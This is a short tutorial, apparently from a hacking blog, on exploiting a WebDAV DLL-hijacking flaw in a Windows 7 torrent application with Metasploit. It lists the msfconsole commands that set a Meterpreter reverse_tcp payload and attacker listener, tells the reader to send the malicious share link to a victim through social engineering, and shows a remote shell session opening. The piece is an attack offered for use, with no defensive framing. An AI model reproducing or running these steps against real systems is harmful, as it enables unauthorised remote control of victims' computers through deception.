Through this article, you will learn WebDAV application DLL hijacking exploitation using Metasploit framework and try to hack the victim through malicious code execution.
Attacker: Kali Linux
Target: Window 7 (torrent)
Open the terminal and type msfconsole to load metasploit framework.
This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.
msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107
msf exploit(webdav_dll_hijacker) >set extensions torrent
msf exploit(webdav_dll_hijacker) >exploit
It has generate a malicious code which you can perceive from screenshot the highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.
Once you have shared malicious code link to the client then must for your meterpreter session, now when client will open the link he will be intended to a document folder with many file extensions and attacker will receive his meterpreter session.
Hence meterpreter session 1 opened successfully now we are connected with target through port 4444.
msf exploit(webdav_dll_hijacker) >sessions 1
NOW TRY YOURSELF GOOD LUCK!!!